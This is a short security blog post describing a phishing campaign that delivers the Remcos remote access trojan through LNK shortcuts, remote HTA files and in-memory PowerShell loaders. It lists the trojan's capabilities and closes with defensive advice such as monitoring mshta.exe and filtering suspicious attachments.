The Invisible File
- Javier Conejo del Cerro
- hace 12 minutos
- 2 Min. de lectura
A Stealthy Threat Returns
In the ever-evolving landscape of cyber threats, stealth has become one of the most valuable weapons in a threat actor’s arsenal. Recently, cybersecurity researchers have unveiled a new campaign involving the Remcos Remote Access Trojan (RAT), one that leverages deceptive phishing emails and fileless malware techniques to compromise Windows systems. The method: PowerShell-based loaders, malicious LNK files, and HTML Applications (HTAs) that operate entirely in memory, bypassing traditional security controls.
Those who can’t see it
The campaign primarily targets users in sectors where documents and administrative forms are part of daily operations—such as finance departments, HR staff, government clerks, and IT administrators. These users often deal with attachments and system-level scripts, making them ideal targets for phishing emails with LNKs posing as tax or invoice files.
Once infected, the malware spreads laterally within organizations, silently siphoning off sensitive documents, login credentials, and system metadata—jeopardizing not only individual devices but entire networks.
Untraced
The attack chain begins with a ZIP file attached to a phishing email, typically themed around taxes or invoices. Inside this ZIP file is a malicious Windows shortcut (.lnk) disguised as a document. Once the shortcut is clicked, it launches mshta.exe, a legitimate Microsoft binary, to fetch and run an obfuscated HTA file hosted on a remote server.
This HTA contains embedded Visual Basic Script that downloads and executes several components: a decoy PDF, a second HTA, and a PowerShell script. The PowerShell script decodes and reconstructs a shellcode loader in memory, which in turn launches the Remcos RAT—entirely filelessly.
Remcos RAT, a modular 32-bit malware written in C++, provides attackers with full remote control over infected systems. It can:
Harvest credentials
Log keystrokes
Monitor clipboard activity
Capture screenshots
List installed software and active processes
Exfiltrate data through TLS-encrypted communication channels
By operating filelessly, the RAT minimizes its footprint on disk, evading many signature-based antivirus solutions and forensics tools.
Spotting the unspotted
This campaign underscores the critical need for modern, layered defenses that go beyond traditional antivirus. Organizations should:
Block execution of HTA and PowerShell scripts from untrusted sources.
Monitor abnormal use of mshta.exe and PowerShell.
Employ advanced email filtering that flags suspicious LNK and ZIP attachments.
Use Endpoint Detection and Response (EDR) systems with behavioral analysis.
.Regularly audit registry changes and startup configurations for persistence indicators.
The resurgence of Remcos RAT in a fileless format illustrates how even well-known malware strains can be retooled to bypass modern defenses. With phishing lures tailored to business routines and execution methods that avoid leaving traces, campaigns like this remind us that cyber hygiene must evolve with the threat landscape.
Stay vigilant. The intruder may be invisible, but the consequences are very real.
Comments